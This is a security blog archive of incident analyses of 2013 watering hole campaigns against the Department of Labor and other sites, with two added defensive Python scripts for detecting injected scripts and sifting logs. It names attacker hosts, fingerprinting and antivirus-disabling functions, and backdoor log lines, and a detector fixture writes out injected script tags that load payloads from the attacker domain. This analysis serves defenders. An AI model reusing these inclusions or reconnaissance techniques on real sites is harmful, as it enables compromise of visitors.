Tag Archives: watering hole attacks

Department of Labor Watering Hole Campaign Review

On April 30th, the watering hole campaign was disclosed on a private mailing list, and on May 1st Invincea and AlienVault publicly reported, with technical details, that the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in a watering hole attack primarily targeting employees of the US Department of Energy who work on nuclear weapons programs. The same code was also used to gather information on the visitors of the compromised website.

The exploit used in this campaign was first reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in the CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release, some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online media and human rights activists.

Two days later, FireEye, Invincea and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792, as they had originally reported, but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. Unfortunately, this turnaround came too late. Casual attackers, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidence.

Microsoft acknowledged the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140, and provided a “Fix it” solution to mitigate the Internet Explorer 8 vulnerability.

Also, Adobe announced through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actively exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server through the “CFIDE/administrator”, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL, and this vulnerability was surely used to compromise the server.

Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347

Confusion with CVE-2012-4792 was possible due to similarities in the code and techniques used:

Usage of widely used JavaScript functions and variables

  • “function getCookieVal(offset)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
  • “function GetCookie(name)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
  • “function SetCookie(name,value)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
  • “var ua = window.navigator.userAgent.toLowerCase()”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.

Usage of particular JavaScript functions also present in previous watering hole campaigns

  • “function DisplayInfo()” was also seen in the CVE-2012-4792 and CVE-2011-0611 exploits.
  • “function download()” and “function callback()” were also seen in the CVE-2012-4792 exploit.

Usage of Ajax XMLHttpRequest

This JavaScript object is used to download the “bookmark.png” file, and was also used to download the “xsainfo.jpg” file in CVE-2012-4792.

Similarities in the JavaScript code structure

If you compare the original CVE-2012-4792 JavaScript code and the Exodus Intel fork with this new exploit, the code structure is very similar in many aspects.

Usage of the HTML+TIME technique

HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792 exploits. This technique was explained by Exodus Intel at the beginning of January 2013.

Target selection

Parts of the code target only Windows XP, Internet Explorer 8 and certain languages, as in CVE-2012-4792.

Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities

Some new particularities were present in the exploit and the associated watering hole campaign:

Usage of PHP files

All previous watering hole attacks used HTML or JavaScript files. Using PHP naturally limits the number of potential servers that could be used to start the exploitation and spread the malware. This approach increasingly resembles the technique used by exploit kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.

Usage of Base64 obfuscation

Obfuscation with base64 encoding (the “base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 used a “robots.txt” file obfuscated with substitutions and hex encoding.

Use-After-Free type

As mentioned by sinn3r of the Metasploit team, CVE-2012-4792 was a CButton object use-after-free, and CVE-2013-1347 is a CGenericElement object use-after-free.

dol[.]ns01[.]us Exploit Hosting Domain Evolution

Invincea and AlienVault reported that the browser was redirected to content hosted at dol[.]ns01[.]us, which led to the infection. A urlQuery submission of 2013-05-01 is mentioned and refers to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script reports a Last-Modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URLs are present in the code.

But if you take a look at a previous urlQuery report, of 2013-04-29, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and present in the executed JavaScript. The 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see, no specific destination port is present and the Last-Modified date is the same. So we can conclude that the people behind this campaign changed the malicious code during this interval.

You can observe this evolution with the urlQuery submission of 2013-04-30.

All these urlQuery submissions were made with a non-Internet Explorer 8 user agent, and as the malicious exploit code was designed to target only Windows XP and Internet Explorer 8, part of the redirections were not captured as evidence.

If you observe the “/scripts/textsize.js” JavaScript code hosted on the DOL website, you can see a first JavaScript inclusion of “hxxp://dol[.]ns01[.]us:8081/web/xss.php” and a second one of “hxxp://dol[.]ns01[.]us:8081/update/index.php”.

The first inclusion, “/web/xss.php”, was used to gather information on the DOL website visitors, and the second inclusion, “/update/index.php”, was used to start the exploitation of CVE-2013-1347.

Information Gathering Scripts

As described by AlienVault, the information gathering code “/web/xss.php” on dol[.]ns01[.]us uses different JavaScript functions to collect information from the system and upload the result to the malicious server.

I found that the information gathering script was different depending on the browser used. Below is a description of the JavaScript functions involved in information gathering, depending on the browser used.

DOL Information Gathering Functions

JavaScript Function(s) | Targeted Browser(s) | Function Description
--- | --- | ---
jstocreate() | Internet Explorer | Tests the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012 and Kaspersky 2013 anti-viruses.
flashver() | Internet Explorer, Firefox & Chrome | Tests the presence and version of Adobe Flash, and the supported OS.
officever() | Internet Explorer | Tests the presence and version of Microsoft Office.
plugin_pdf_ie() | Internet Explorer | Tests the presence of Adobe Reader.
bitdefender2012check() | Internet Explorer, Firefox & Chrome | Tests the presence of BitDefender 2012 and tries to disable it through the disabledbitdefender_2012() function.
java() | Internet Explorer, Firefox & Chrome | Tests the presence and version of the Oracle Java plug-in.
xunleicheck() | Firefox & Chrome | Tests the presence of the xThunder Chrome extension, an extension managing popular downloaders.
kavcheck() | Firefox & Chrome | Tests the presence of the Kaspersky Chrome extension.
fiddlercheck() | Firefox & Chrome | Tests the presence of the Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application.
liveheadercheck() | Firefox & Chrome | Tests the presence of the Live HTTP Headers Chrome extension.
webdevelopercheck() | Firefox & Chrome | Tests the presence of the Web Developer Chrome extension.
avg2012check() | Firefox & Chrome | Tests the presence of the AVG 2012 Chrome extension.
tamperdatacheck() | Firefox & Chrome | Tests the presence of the Tamper Data Chrome extension.
adblockcheck() | Firefox & Chrome | Tests the presence of the Adblocker Chrome extension.
avastcheck() | Firefox & Chrome | Tests the presence of the Avast! Chrome extension.
pluginverother() | Firefox & Chrome | Tests the presence of all installed modules.

All functions used by the information gathering script involved in the DOL watering hole campaign.

Also, a specific information gathering technique was triggered when Internet Explorer was used. This technique is related to an unpatched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.

[Figure: SA2012-02]

Once all the information is gathered, the script sends all the data to a specific URL, “hxxp://dol[.]ns01[.]us:8081/web/js.php”, and also calls “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information has been collected.

An interesting piece of information regarding “/web/css.js” is that the “Last-Modified” date reported by the “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This shows that the information gathering infrastructure had been in place since at least mid-March.

Interesting facts regarding these information gathering scripts are:

  • The “xss.php”, “js.php” and “css.js” scripts moved from IP 96[.]44[.]136[.]115 on port 80/TCP to the domain dol[.]ns01[.]us on port 8081/TCP. Moving from port 80/TCP to 8081/TCP does not seem logical: most of the time, the outgoing connections authorized on firewalls for corporate web surfing are 80/TCP and 443/TCP.
  • Different types of information gathering scripts were in place, and all users who visited the DOL website were affected by this information gathering campaign.
  • A specific information leakage vulnerability present in Internet Explorer 8, and not fixed by Microsoft, was used.
  • The BitDefender 2012 deactivation attempt is confusing: why try to deactivate an anti-virus, when this will surely generate an alert?
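
To catch this kind of injected inclusion on a site you defend, here is an added example (not code from the original post): it scans a file's content for external script tags, including those emitted through document.write(), and flags hosts outside an allow-list, non-standard ports and PHP-served scripts. The sample textsize.js content, the allow-list and the "standard ports" set are assumptions constructed for the example.

```python
"""Flag external script inclusions injected into a site's own files.

Added example, not code from the original post. The sample file content
below is constructed to mirror the injected "/scripts/textsize.js" the
post describes: a legitimate same-site script followed by two inclusions
pointing at dol.ns01.us on the non-standard port 8081.
"""
import re
from urllib.parse import urlsplit

# Hosts the site is allowed to load scripts from (assumed for this example).
ALLOWED_HOSTS = {"www.sem.dol.gov", "sem.dol.gov"}
# Ports normally authorised for outbound web traffic on a corporate firewall.
STANDARD_PORTS = {80, 443}

# Matches the URL of a <script src=...> tag, whether written directly in HTML
# or emitted from JavaScript via document.write()/string concatenation.
SCRIPT_SRC_RE = re.compile(
    r"""<script[^>]*?\bsrc\s*=\s*["']?\s*((?:https?:)?//[^"'\s>]+)""",
    re.IGNORECASE,
)

# Constructed sample, modelled on the injected textsize.js described above.
SAMPLE_TEXTSIZE_JS = """
function textsize(n) { document.body.style.fontSize = n + 'px'; }
document.write('<script src="http://www.sem.dol.gov/scripts/jquery.js"></scr' + 'ipt>');
document.write('<script type="text/javascript" src="http://dol.ns01.us:8081/web/xss.php"></scr' + 'ipt>');
document.write("<script src='http://dol.ns01.us:8081/update/index.php'></scr" + "ipt>");
"""


def find_script_inclusions(content):
    """Return every external script URL referenced in the given file content."""
    return SCRIPT_SRC_RE.findall(content)


def classify_inclusion(url):
    """Return the reasons a script URL looks injected (empty list if it looks fine)."""
    # Protocol-relative URLs ("//host/x") are resolved as http for the check.
    parts = urlsplit(url if "://" in url else "http:" + url)
    reasons = []
    if parts.hostname not in ALLOWED_HOSTS:
        reasons.append("host %s not in allow-list" % parts.hostname)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in STANDARD_PORTS:
        reasons.append("non-standard port %d" % port)
    if parts.path.endswith(".php"):
        reasons.append("script served by PHP (%s)" % parts.path)
    return reasons


def audit_file(content):
    """Return [(url, reasons)] for every inclusion that has at least one reason."""
    findings = []
    for url in find_script_inclusions(content):
        reasons = classify_inclusion(url)
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in audit_file(SAMPLE_TEXTSIZE_JS):
        print(url, "->", "; ".join(reasons))
```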

Information Gathered on dol[.]ns01[.]us

As described in the previous chapter, the information gathering code sends a lot of information to the backend. Fortunately for security researchers, the backend wasn’t very well protected, and all the collected information was accessible without any restriction in different web folders. Below are some statistics related to the gathered information.

[Figure: top 10 targeted countries]

Complete geolocation of the targeted source IPs

By analyzing the information sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:

  • From 2013-03-15 to 2013-04-29: the University Research Co. Cambodia website (www.urccambodia.org) was the first target. This explains the high number of distinct IP addresses from Cambodia.
  • From 2013-04-08 to 2013-04-24: the Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of the Fraser Institute, was the second target.
  • From 2013-04-08 to 2013-04-24: the ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
  • From 2013-04-09 to 2013-04-30: the French Institute of International Relations website (www.ifri.org) was the fourth target.
  • From 2013-04-09 to 2013-04-24: the Working for America Institute website (www.workingforamerica.org) was the fifth target.
  • From 2013-04-09 to 2013-04-10: the Project 2049 Institute website (www.project2049.net) was the sixth target.
  • From 2013-04-10 to 2013-04-10: the Union Label and Service Trades Department website (www.unionlabel.org) was the seventh target.
  • From 2013-04-11 to 2013-04-30: the Thales Catalogue website (components-subsystems.thales-catalogue.com) was the eighth target.
  • From 2013-04-23 to 2013-05-01: the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov) was the ninth target.

Below are the hits by browser, and the Internet Explorer 8 hits by OS.

[Figure: hits by browser]

[Figure: Internet Explorer 8 hits by OS]

Other Information Gathered

As you read in the previous chapter, the ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is still present but no longer responds. Also, if you observe the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been set up to replace the deactivated one.

If you observe the “Last-Modified” date of the “css.js” file, the installation date of these files is at least 2013-05-03.

Also, by searching Google for some patterns matching the information gathering script, you can find some previously unknown campaigns that were using the same code.

A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter

This post is a small part of an in-depth analysis of the December watering hole campaign involving an Internet Explorer 0day. Jindrich Kubec and myself are working hard to synthesize all this information in order to provide you with a high-level overview.

As I mentioned to threatpost.com on the 14th of January, additional web sites were discovered hosting the Internet Explorer CVE-2012-4792 exploit. One of the additional web sites was “All Jap auto parts” (www.alljap.net), an importer of second-hand Japanese engines and car parts located in Brisbane, Queensland, Australia.

StopMalvertising published an analysis that I recommend for additional information.

When I discovered this infected web site, I initially noticed that the files were time stamped (HTTP Last-Modified entity-header) with the following dates:

  • deployJava.js : Fri, 14 Dec 2012 15:47:42 GMT
  • index.html : Fri, 14 Dec 2012 15:49:58 GMT
  • news.html : Fri, 14 Dec 2012 15:50:42 GMT
  • robots.txt : Fri, 14 Dec 2012 15:50:57 GMT
  • today.swf : Fri, 14 Dec 2012 15:51:08 GMT
  • xsainfo.jpg : Fri, 14 Dec 2012 15:56:44 GMT

The “index.html” file supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw), Japanese (ja), American English (en-us) and Russian (ru). The “girl” and “boy” patterns were present, and the “hello” text was hidden.

The CFR.org version of “index.html”, which I discovered in Google cache and which dates from the 7th of December, only supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw) and American English (en-us). The “girl” and “boy” patterns were also present, and the “hello” text was not hidden.

The CFR.org version reported by FireEye, from around the 20th of December, supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw), Japanese (ja), American English (en-us), Russian (ru) and Korean (ko). The “girl” and “boy” patterns were no longer present and were replaced by the “ms-help:” technique to bypass ASLR on Windows 7. The “hello” text was also hidden.

By analyzing only these samples, from CFR.org and All Jap auto parts, we can observe that the attackers changed tactics multiple times during this campaign.

By analyzing all the samples from other infected web sites (around 40 infected web site samples), I observed that All Jap auto parts was not used in the watering hole campaign: no high-value legitimate website was including this website, by iframe or by JavaScript inclusion.

By doing some further analysis regarding All Jap auto parts, I initially observed that the hosted phpMyFAQ and WWWBoard tools had not been updated for a long time. And after some Google dorks, I found two PHP backdoors and the Apache logs (from the 13th of November to the beginning of February), which were freely accessible from the Internet. We will name the first backdoor BK1 and the second BK2 for further reference in this blog post.

Having free access to the logs was a unique opportunity to find additional evidence regarding the attackers and the differences in the samples and patterns.

I first searched the logs for accesses to the backdoors. BK1 was not present in the logs, but BK2 was accessed on the 7th of December by IP 112.175.234.199. The IP is located in South Korea and is associated with a FlyVPN.com VPN mirror. The user agent associated with this IP is Internet Explorer 8 under Windows XP.

112.175.234.199 - - [07/Dec/2012 00:31:22 +0000] "GET /BK2.php HTTP/1.1" 200 371 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"

By searching for additional references to this IP, we can observe a first access to the CVE-2012-4792 exploit on the 7th of December with a different user agent, Firefox 12 under Windows XP.

112.175.234.199 - - [07/Dec/2012 01:18:59 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"

We can directly observe that the HTTP referer was Global Business Network (www.gbn.com), and that All Jap auto parts was also involved in a watering hole campaign. Description of GBN:

GBN helps organizations adapt and grow in an increasingly uncertain and volatile world. Using our leading-edge tools and expertise—scenario planning, experiential learning, networks of experts and visionaries—we enable our clients to address their most critical challenges and gain the insight, confidence, and capabilities they need to shape the future.

We can also confirm, as for CFR.org, that the exploit had been present on All Jap auto parts since at least the 7th of December.

By doing a complete log analysis, we can observe the following timeline and information.

Alljap - 112.175.234.199 - South Korea IP Activities

Dates | User Agents | Actions
--- | --- | ---
07/Dec/2012 00:31:22 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
07/Dec/2012 00:31:25 to 00:32:47 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
07/Dec/2012 00:32:58 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Modify mail.php through BK2
07/Dec/2012 00:33:10 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Modify tw.htm through BK2
07/Dec/2012 00:33:24 to 00:40:05 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
07/Dec/2012 01:18:59 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com
07/Dec/2012 17:55:15 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com

This IP accessed BK2 directly, with no other web page visits. You can observe that some PHP mail code (mail.php) was put in place in order to send spear phishing emails targeted at Taiwanese people (tw.htm). A bunch of operations were done through BK2. You can also observe that they tested the exploit with Firefox 12.

Alljap - 113.30.106.94 - South Korea IP Activities

Dates | User Agents | Actions
--- | --- | ---
10/Dec/2012 08:15:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Check presence of 0day
10/Dec/2012 08:15:56 to 08:19:00 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:19:25 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to demo.txt (demo~) file
10/Dec/2012 08:19:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day
10/Dec/2012 08:20:13 to 08:22:11 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:27:30 to 08:29:54 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day through GBN.com

This IP accessed BK2 directly, with no other web page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in South Korea, with only a PPTP VPN port open. You can also observe the usage of a file named “demo.txt”.

Alljap - 59.124.14.102 - Taiwan IP Activities

Dates | User Agents | Actions
--- | --- | ---
10/Dec/2012 08:42:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
10/Dec/2012 08:42:38 to 08:44:00 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:54:36 to 08:54:49 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day through GBN.com
10/Dec/2012 09:09:52 to 09:09:57 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 09:11:08 to 09:11:55 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access 0day files
10/Dec/2012 09:12:14 to 09:13:18 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test presence of deployJava.js
10/Dec/2012 09:13:41 to 09:15:36 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 09:23:10 to 09:28:11 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Operations through BK2

This IP accessed BK2 directly, with no other web page visits, manipulated the content of the CVE-2012-4792 0day and did some tests from GBN.com. The IP is located in Taiwan, with only a PPTP VPN port open.

Alljap - 112.213.97.39 - Hong-Kong IP Activities

Dates | User Agents | Actions
--- | --- | ---
14/Dec/2012 15:44:40 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:44:47 to 15:49:58 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2

This IP accessed BK2 directly, with no other web page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in Hong Kong, with only a PPTP VPN port open.

Alljap - 113.30.106.92 - South Korea IP Activities

Dates | User Agents | Actions
--- | --- | ---
14/Dec/2012 15:50:42 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:50:57 to 15:52:57 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2

This IP accessed BK2 directly, with no other web page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in South Korea, with only a PPTP VPN port open.

Alljap - 110.4.82.38 - South Korea IP Activities

Dates | User Agents | Actions
--- | --- | ---
14/Dec/2012 15:54:14 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Check presence of demo.txt file
14/Dec/2012 15:55:04 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:56:44 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operation through BK2
14/Dec/2012 16:02:19 to 16:03:56 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com
16/Dec/2012 12:08:45 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com

This IP accessed BK2 directly, with no other web page visits, manipulated the content of the CVE-2012-4792 0day and did some tests from GBN.com. The IP is located in South Korea.

As you can see, the attackers massively used VPN connections in order to connect to BK2. If you compare the “Last-Modified” HTTP headers of the samples, you can see that they correspond to the manipulations of the last three different IPs.

As we have the complete Apache logs, I was also able to analyze the attack surface of the watering hole campaign through GBN.

My first analysis was to see all successful hits to the “index.html” file from the 7th to the 17th of December, without any segregation. By clicking on the following link you will access a Google Fusion Table providing all the associated information.

You can also find the TOP 10 countries which hit the exploit.

Alljap - All Hits TOP 10 Countries

Country | Unique IP count
--- | ---
US | 311
BR | 77
CN | 64
TR | 44
GB | 30
DE | 25
CA | 23
IN | 19
FR | 19
MX | 18

My second analysis was to see all potentially successful exploitations targeting “MSIE 8.0”, from the 7th to the 17th of December. By clicking on the following link you will access a Google Fusion Table providing all the associated information.

You can also find the TOP 10 countries which hit the exploit.

Alljap - All MSIE 8.0 Hits TOP 10 Countries

Country | Unique IP count
--- | ---
US | 35
CN | 13
TR | 5
BR | 3
GB | 3
RO | 3
MA | 3
AU | 3
HK | 2
TH | 2

You can see that the potential success rate, compared to the number of GBN visitors, is very low. Using a 0day only capable of targeting MSIE 8.0 was clearly a limiting factor.
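
As an added example (not the author's own tooling), the following Python script performs the two analyses above on Apache combined-format lines: it selects successful hits on the exploit page within a date window, optionally restricted to a referer and a user-agent substring, and ranks countries by unique source IPs. The log lines (documentation-range IPs) and the IP-to-country table are constructed sample data; a real run would replace the table with a GeoIP lookup.

```python
"""Sift Apache access logs for watering-hole exploit hits, as done on the
All Jap logs above. Added example, not the post's own tooling: the log
lines and the IP-to-country table are constructed sample data.
"""
import re
from collections import Counter, defaultdict

# Accepts both the standard "[07/Dec/2012:00:31:22 +0000]" timestamp and the
# "[07/Dec/2012 00:31:22 +0000]" form in which the lines above are quoted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/\w{3}/\d{4})[: ](?P<time>[\d:]+) [^\]]*\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UA_IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
UA_FF12 = "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
EXPLOIT_PAGE = "/wwwboard/news/index.html"

# Constructed sample log (IPs from documentation ranges), not the real log.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Dec/2012 00:31:22 +0000] "GET /BK2.php HTTP/1.1" 200 371 "-" "%s"' % UA_IE8,
    '198.51.100.7 - - [07/Dec/2012 01:18:59 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "%s"' % UA_FF12,
    '203.0.113.10 - - [08/Dec/2012:10:02:11 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "%s"' % UA_IE8,
    '203.0.113.10 - - [08/Dec/2012:10:02:12 +0000] "GET /wwwboard/news/deployJava.js HTTP/1.1" 200 901 "http://www.alljap.net/wwwboard/news/index.html" "%s"' % UA_IE8,
    '203.0.113.11 - - [09/Dec/2012:11:40:00 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "%s"' % UA_IE8,
    '192.0.2.55 - - [12/Dec/2012:03:15:45 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"',
    '192.0.2.56 - - [20/Dec/2012:09:00:00 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "%s"' % UA_IE8,
    '203.0.113.12 - - [15/Dec/2012:14:22:09 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 404 210 "-" "%s"' % UA_IE8,
]

# Placeholder for a GeoIP lookup (constructed mapping for the sample IPs).
COUNTRY_OF = {"198.51.100.7": "KR", "203.0.113.10": "US", "203.0.113.11": "US",
              "192.0.2.55": "BR", "192.0.2.56": "US", "203.0.113.12": "CN"}

MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    d, mon, y = rec["day"].split("/")
    rec["date"] = (int(y), MONTHS[mon], int(d))   # sortable (year, month, day)
    rec["status"] = int(rec["status"])
    return rec


def exploit_hits(lines, path, start, end, ua_contains=None, referer_contains=None):
    """Successful (HTTP 200) requests for `path` dated within [start, end], optionally
    restricted to a user-agent substring and a referer substring."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 200 or rec["path"] != path:
            continue
        if not (start <= rec["date"] <= end):
            continue
        if ua_contains and ua_contains not in rec["ua"]:
            continue
        if referer_contains and referer_contains not in rec["referer"]:
            continue
        hits.append(rec)
    return hits


def top_countries(hits, n=10):
    """Unique source IPs per country, most affected first."""
    ips_by_country = defaultdict(set)
    for rec in hits:
        ips_by_country[COUNTRY_OF.get(rec["ip"], "??")].add(rec["ip"])
    counts = Counter({c: len(ips) for c, ips in ips_by_country.items()})
    return counts.most_common(n)


if __name__ == "__main__":
    window = ((2012, 12, 7), (2012, 12, 17))
    all_hits = exploit_hits(SAMPLE_LOG, EXPLOIT_PAGE, *window, referer_contains="gbn.com")
    ie8_hits = exploit_hits(SAMPLE_LOG, EXPLOIT_PAGE, *window,
                            ua_contains="MSIE 8.0", referer_contains="gbn.com")
    print("all hits:", top_countries(all_hits))
    print("MSIE 8.0 hits:", top_countries(ie8_hits))
```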

As explained at the beginning of the blog post, this post is only a small part of what has been analyzed. Jindrich Kubec and I will provide you with additional information soon.

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

As I announced on Twitter, this blog post will present targeted attacks which started mid-September and were not discussed or presented in public. These attacks ended around mid-October.

A web site, “arpeggio8.com”, hosted on 205.186.179.195 in the US, was compromised in order to be used in a watering hole attack against the Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a French-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is a dedicated web site for Chinese news in Chinese language.

The watering hole attack was done through different files and a dedicated centralized backend named “Jsbug”.

Description of the watering hole attack

The Space Foundation and RSF Chinese web sites had in their code a malicious JavaScript inclusion calling “http://www.arpeggio8.com/count/count.php”.

The “count.php” script provides JavaScript content which checks for the presence of a “popad” cookie and whether the browser is Internet Explorer 6, 7 or 8. This script also loads “count2.php”, which is used for other purposes; we will discuss this file later. If all the conditions are met, the “rsf.php” file is loaded with the parameter “id=1024”.

